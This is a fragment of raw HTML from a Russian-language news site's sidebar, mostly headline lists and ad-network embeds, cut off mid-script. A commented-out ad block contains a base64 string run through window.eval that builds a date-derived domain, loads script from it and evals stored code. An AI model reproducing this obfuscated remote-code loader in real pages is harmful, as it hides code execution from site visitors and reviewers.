href="https://enovosty.com/news_abroad/full/2002-amerikanskij-i-rossijskij-broneavtomobili-vstupili-v-konflikt-v-sirii-video">Американский и российский бронеавтомобили вступили в конфликт в Сирии</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news-auto/full/1302-v-seti-pokazali-yarkie-ispytaniya-moshhnogo-konkurenta-tesla-video"><img width="142" height="88" alt="В Сети показали яркие испытания мощного конкурента Tesla" src="https://enovosty.com/wp-content/uploads/2020/02/screenshot_9-2-e1581591140636.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/1302-v-seti-pokazali-yarkie-ispytaniya-moshhnogo-konkurenta-tesla-video">В Сети показали яркие испытания мощного конкурента Tesla</a></div></td></tr><tr><td class="view"><span><i></i>2248</span></td><td class="view"><span><i></i>2009</span></td><td class="view last"><span><i></i>1955</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_technology/full/1402-armiya-ssha-potratit-bolee-1-mlrd-na-novuyu-sverxtochnuyu-raketu" rel="bookmark">Армия США потратит более $1 млрд на новую сверхточную ракету</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1102-morskie-sily-samooborony-yaponii-provodyat-ispytaniya-rakety-zemlya-korabl" rel="bookmark">Морские силы самообороны Японии проводят испытания ракеты "земля-корабль"</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_technology/full/702-avianosec-uss-gerald-r-ford-proshel-testy-na-sovmestimost-s-razlichnymi-vozdushnymi-sudami-foto" rel="bookmark">Авианосец USS Gerald R Ford прошел тесты на совместимость с различными воздушными судами (ФОТО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/602-rossiya-besposhhadno-ispolzuet-ukrainu-dlya-svoix-ispytanij-smi" rel="bookmark">Россия беспощадно использует Украину для своих испытаний, - СМИ</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/502-ispytaniya-pokazali-chto-avianosec-uss-gerald-r-ford-stoimostyu-13-mlrd-ne-gotov-k-boyu" rel="bookmark">Испытания показали, что авианосец USS Gerald R. Ford стоимостью $13 млрд не готов к бою</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/302-ukrainskij-broneavtomobil-varta-uspeshno-zavershaet-gosudarstvennye-ispytaniya" rel="bookmark">Украинский бронеавтомобиль «Варта» успешно завершает государственные испытания</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_technology/full/2401-general-dynamics-pokazala-morskie-ispytaniya-podvodnogo-bespilotnika-bluefin-9-video" rel="bookmark">General Dynamics показала морские испытания подводного беспилотника Bluefin-9 (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_technology/full/2101-avtomobili-tesla-budut-dostavlyat-astronavtov-k-raketam-spacex" rel="bookmark">Автомобили Tesla будут доставлять астронавтов к ракетам SpaceX</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4794646" class="postafisha"><span class="region">Киев 20&#160;февраля</span><div class="aimg"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-richard-dzhuell"><img width="170" height="132" alt="Кинопремьера: фильм «Ричард Джуэлл»" src="/wp-content/uploads/2020/02/richard-jewell.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-richard-dzhuell">Кинопремьера: фильм «Ричард Джуэлл»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4794652" class="postafisha"><span class="region">Киев 20&#160;февраля</span><div class="aimg"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-rabota-bez-avtorstva"><img width="170" height="132" alt="Кинопремьера: фильм «Работа без авторства» ..." src="/wp-content/uploads/2020/02/avtor.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1702-kinopremera-film-rabota-bez-avtorstva">Кинопремьера: фильм «Работа без авторства» ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4355059"><a href="https://enovosty.com/armiya/full/654-pistolet-pulemet-fort-224" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/654-pistolet-pulemet-fort-224" >Пистолет-пулемет "Форт-224"</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4413432"><a href="https://enovosty.com/armiya/full/742-boevaya-mashina-pehoty-ascod-avstriya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/12/ASCOD-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/ASCOD-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/12/ASCOD-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/ASCOD.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/742-boevaya-mashina-pehoty-ascod-avstriya" >Боевая машина пехоты ASCOD (Австрия)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4422068"><a href="https://enovosty.com/armiya/full/713-sistema-protivoraketnoj-oborony-zheleznyj-kupol-izrail" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/01/Zhelezn_Kupol-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/01/Zhelezn_Kupol-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/01/Zhelezn_Kupol-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/01/Zhelezn_Kupol.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/713-sistema-protivoraketnoj-oborony-zheleznyj-kupol-izrail" >Система противоракетной обороны «Железный купол» (Израиль)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4488961"><a href="https://enovosty.com/armiya/full/262-tank-azovec" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/12/azovets-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/12/azovets-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/12/azovets-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/12/azovets.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/262-tank-azovec" >Танк «Азовец»</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости технологий</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4248,976', 4248, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4248,976', 4248, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4248,976', 4248, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_technology/full/1702-a-gde-zhe-rodster-programmist-rasschital-primernoe-mestopolozhenie-zapushhennogo-v-kosmos-avtomobilya-tesla">А где же родстер? Программист рассчитал примерное местоположение запущенного в космос автомобиля Tesla (1728)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1402-boeing-postavil-zakazchikam-500-j-vertolet-ch-47f-chinook">Аэрогигант Boeing поставил заказчикам юбилейный 500-й двухроторный вертолет CH-47F Chinook (1688)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1502-tretya-stupen-rakety-nositelya-ciklon-3-razrushilas-v-kosmose-na-75-oblomkov">Третья ступень ракеты-носителя "Циклон-3" разрушилась в космосе на 75 обломков (1477)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1702-istrebitel-5-go-pokoleniya-f-35-lightning-ii-pokazal-neobychnyj-tryuk-na-aviavystavke-video">Истребитель 5-го поколения F-35 Lightning II показал необычный трюк на авиавыставке (ВИДЕО) (1463)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1702-podvodnye-avianoscy-proekt-kotoryj-tak-i-ne-stal-uspeshnym">Подводные авианосцы: проект, который так и не стал успешным (1413)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1502-obnaruzhen-pancir-samoj-drevnei-cherepaxi-v-mire-foto">Обнаружен панцирь самой огромной черепахи в мире (ФОТО) (1280)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1902-ssha-otkazalis-ot-ocherednoj-voennoj-programmy-prekrashhena-razrabotka-perspektivnoj-rakety-mirm">США отказались от очередной военной программы: прекращена разработка перспективной ракеты MIRM (1182)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1902-rossijskij-ledokol-arktika-vyshel-iz-stroya-sgorevshij-dvigatel-ne-podlezhit-vosstanovleniyu">Не судьба: "Росатом" не успеет сдать в срок атомный ледокол "Арктика" - двигатель сгорел (1073)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/1902-britanskaya-armiya-sobiraetsya-stroit-elektricheskie-boevye-mashiny">Британская армия собирается строить электрические боевые машины (807)</a></h3><h3 class="press"><a href="https://enovosty.com/news_technology/full/2002-amerikanskij-flot-mozhet-poluchit-eshhe-odin-krejser">Американский флот может получить еще один крейсер (740)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4323134"><a href="https://enovosty.com/person/full/guta-ivan" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/11/ivan_guta-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/11/ivan_guta-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/11/ivan_guta.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/guta-ivan" >Иван<br /> ГУТА</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4428424"><a href="https://enovosty.com/person/full/774-sakvarelidze-david" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/02/sakvaralidze-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/02/sakvaralidze-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/02/sakvaralidze.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/774-sakvarelidze-david" >Давид<br /> САКВАРЕЛИДЗЕ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4492407"><a href="https://enovosty.com/person/full/817-holodnickij-nazar" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/12/holodnitskiy-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/12/holodnitskiy-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/12/holodnitskiy.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/817-holodnickij-nazar" >Назар<br /> ХОЛОДНИЦКИЙ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4519736"><a href="https://enovosty.com/person/full/715-chernysh-vadim" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2016/04/chernish-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/04/chernish-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/04/chernish.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/715-chernysh-vadim" >Вадим<br /> ЧЕРНЫШ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/1902-luchee-foto-novorozhdennymi-shhenkami-pokorilo-set-foto">Собачье семейство с новорожденными щенками покорило сеть (ФОТО) (4524)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1902-zvezda-walmart-rabotnica-amerikanskogo-supermarketa-yarko-poziruet-dlya-reklamy-foto">Звезда Walmart: работница американского супермаркета ярко позирует для рекламы (ФОТО) (4077)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1902-net-zakazov-rossijskij-sukhoi-superjet-uxodit-v-pike">"Нет заказов": российский Sukhoi Superjet уходит в пике (3346)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/2002-bezkoshtovne-rozmitnennya-avtomobiliv-xto-v-ukraini-bude-mati-na-ce-pravo">Безкоштовне розмитнення автомобілів: хто в Україні буде мати на це право (2948)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1902-sueta-v-kremle-putin-ponyal-chto-proigral-piontkovskiy">"Суета в Кремле": Путин понял, что проиграл - Пионтковский (2232)</a></p><p class="press"><a href="https://enovosty.com/uk/news_abroad-ukr/full/1902-nemaye-zamovlen-rosijskij-sukhoi-superjet-uxodit-v-pike">"Немає замовлень": російський Sukhoi Superjet уходить в піке (2010)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2002-amerikanskij-i-rossijskij-broneavtomobili-vstupili-v-konflikt-v-sirii-video">Американский и российский бронеавтомобили вступили в конфликт в Сирии (ВИДЕО) (1988)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1902-pobeda-za-pobedoj-bez-promaxov-i-porazhenij-vereshhuk-ob-otchete-kabmina-goncharuka-video">«Победа за победой, без промахов и поражений»: Верещук об отчете Кабмина Гончарука (ВИДЕО) (1720)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/1902-vsem-bojcam-ozvuchili-plan-nastupleniya-na-ukropov-boevik-vozmutilsya-lozhyu-o-nastuplenii">"Всем бойцам озвучили план наступления на укропов" - боевик возмутился ложью о наступлении (1550)</a></p><p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/2002-nam-znovu-proponuyut-domovitisya-z-vbivcyami-oleg-sencov">Нам знову пропонують домовитися з вбивцями - Олег Сенцов (1484)</a></p></div> </div><div id="rontar_adplace_13638"></div><script type="text/javascript"><!--

(function (w, d, n) {var ri = { rontar_site_id: 4818, rontar_adplace_id: 13638, rontar_place_id:
'rontar_adplace_13638', adCode_rootUrl: 'https://adcode.rontar.com/' };
w[n] = w[n] || [];w[n].push(
ri
);var a = document.createElement('script');a.type = 'text/javascript';a.async = true;a.src = 'https://adcode.rontar.com/rontar2_async.js?rnd=' +
Math.round(Math.random() * 100000);var b = document.getElementById('rontar_adplace_' + ri.rontar_adplace_id);b.parentNode.insertBefore(a, b);})(window, document, 'rontar_ads');//--></script><br /></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id="adriver_banner_C1"></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1002-sluga-novikov-pomogaet-kvazaru-kinut-bank-na-100-mln-griven">"Слуга" Новиков помогает "КВАЗАРУ" "кинуть" банк на 100 млн гривен</a></p><p class="press"><a href="https://enovosty.com/publications/full/2401-koncessiya-xersonskogo-porta-kakie-riski-neset-pobeda-risoil">Концессия Херсонского порта: какие риски несет "победа" Risoil</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/tehnologii/full/2112-televizory-lg-pervymi-prevosxodyat-otraslevoe-opredelenie-8k-ultra-hd-tv" title="Телевизоры LG первыми превосходят отраслевое определение 8K ULTRA HD TV" > <img width="153" height="200" src="https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01.jpg 600w, https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01-86x112.jpg 86w, https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01-229x300.jpg 229w, https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01-489x640.jpg 489w, https://enovosty.com/wp-content/uploads/2019/12/lge_cta-8k-certification_01-460x602.jpg 460w" sizes="(max-width: 153px) 100vw, 153px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/tehnologii/full/2112-televizory-lg-pervymi-prevosxodyat-otraslevoe-opredelenie-8k-ultra-hd-tv" style="line-height: 1.1;" rel="bookmark" title="Телевизоры LG первыми превосходят отраслевое определение 8K ULTRA HD TV">Телевизоры LG первыми превосходят отраслевое определение 8K ULTRA HD TV</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/1502-sogodni-den-stritennya-gospodnogo-istoriya-i-tradicii-svyata">Сьогодні день Стрітення Господнього: історія і традиції свята (7562)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1402-ty-chego-bykuesh-scklo-mezhdu-chernovol-i-dobkinym-v-pryamom-efire-proizoshla-perepalka-video">"Ты чего быкуешь, сц*кло?: Между Черновол и Добкиным в прямом эфире произошла перепалка (ВИДЕО) (7450)</a></p><p class="press"><a href="https://enovosty.com/politika/full/1402-karasev-vs-fesenko-pochemu-zelenskij-ubral-bogdana">Карасев vs Фесенко: почему Зеленский убрал Богдана? (7133)</a></p></div></div></div><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
